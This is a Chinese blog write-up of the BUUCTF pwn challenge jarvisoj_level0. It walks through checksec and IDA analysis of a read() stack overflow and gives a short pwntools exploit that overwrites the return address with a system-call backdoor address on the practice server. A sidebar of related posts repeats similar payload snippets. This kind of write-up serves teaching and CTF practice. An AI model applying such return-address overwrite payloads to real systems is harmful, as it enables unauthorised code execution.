[BUUCTF-pwn]——jarvisoj_level0

最新推荐文章于 2024-07-05 00:08:58 发布
最新推荐文章于 2024-07-05 00:08:58 发布
阅读量1.8k 收藏
点赞数 8
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113461446
版权
本文分享了如何在jarvisoj_level0挑战中,通过64位栈溢出利用技巧,找到system函数地址并构造exploit payload。作者详细描述了IDA分析、栈溢出原理、参数覆盖和最终的exploit实现过程。
摘要由CSDN通过智能技术生成

[BUUCTF-pwn]——jarvisoj_level0

  • 题目地址:https://buuoj.cn/challenges#jarvisoj_level0
  • 题目:在这里插入图片描述
    还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。
    在这里插入图片描述
    64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数
    在这里插入图片描述
    发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。
    在这里插入图片描述
    再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆盖的返回地址。看过我之前的博文的人都知道,我比较喜欢system压参的位置。
    在这里插入图片描述
    在这里插入图片描述
    再看看buf这个局部变量,先想要覆盖需要0x80 + 0x8的距离

在这里插入图片描述
在这里插入图片描述

expolit

from pwn import *
p = remote("node3.buuoj.cn",xxxx)
ret_arr = 0X40059A
payload = 'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()

在这里插入图片描述

点赞点赞点赞,兄弟们、姐妹们、家人们!!! 😃

Y-peak
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 679
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 529
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
buuctf jarvisoj_level0
carol2358的博客
04-17 643
栈溢出,然后覆盖返回地址为system的地址。 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() ...
BUUCTF-PWN】6-jarvisoj_level0
最新发布
燕麦葡萄干的博客
07-05 217
buf变量长度为128,但是read可以读入0x200长度的字符,存在栈溢出,需要覆盖的长度为0x80+8。vulnerable_function()函数。64位,开启了NX保护。
[BUUCTF]PWN------jarvisoj_level0
BangSen1的博客
01-18 338
jarvisoj_level0 例行检查,64bit,开启NX保护。 nc一下,出现了Hello world,接着让我们输入,没有有用的信息。 ‘用IDA打开,看到了/bin/sh 双击跟进,Ctrl+x查看被什么调用,找到了后门,所以shell_addr=0x400596 查看主函数,寻找输入点。 可以看到buf的大小是0x80,但它读取时只读了0x20,可以溢出,覆盖返回地址为后门地址既可 exp flag ...
buuctfjarvisoj_level0
weixin_54452942的博客
03-28 1104
64位(system_addr+1)的奥秘
[BUUCTF]PWN8——jarvisoj_level0
mcmuyanga的博客
08-26 582
[BUUCTF]PWN8——jarvisoj_level0 题目网址:https://buuoj.cn/challenges#jarvisoj_level0 步骤: 例行检查,64位,开启了NX保护 nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入 用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh 双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596 根据
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 298
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 979
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 283
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
CTF buuoj pwn-----第6题:jarvisoj_level0
bing_Max的博客
09-02 1064
CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言 记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机,下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'
[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 496
[buuctf]jarvisoj_level0
BUUCTF-Pwn-jarvisoj_level0
餐桌上的猫
02-12 342
题目截图 panyload=b’b’*(0x80+8)+p64(0x400596)
BUUCTF-PWN-jarvisoj_level0
Henlenl的博客
05-12 156
文章目录查看文件信息IDA 分析exp 查看文件信息 64位elf文件 IDA 分析 我们来到main()函数 再进入vulnerable_function()函数 典型的read()栈溢出漏洞,buf有0x80 [rbp + 80h] 所以 如果要覆盖的话 需要0x80 + rbp本身的8字节 同时我们发现 callsystem函数 地址为 0x400596,所以payload = ‘a’ * (0x80 + 8) + p64(0x400596) exp from pwn import *
jarvis oj level0
发蝴蝶和大脑斧的博客
12-01 906
菜鸟入门,先从level0开始下手。 首先checksec,发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida,查看vulnerable_function ssize_t...
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 353
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...
jarvisoj_level0
z1r0的博客
12-03 291
jarvisoj_level0 查看保护 有溢出,有后门,ret2text。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25048) else: r = process(file_name) elf = ELF(file_name) def
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值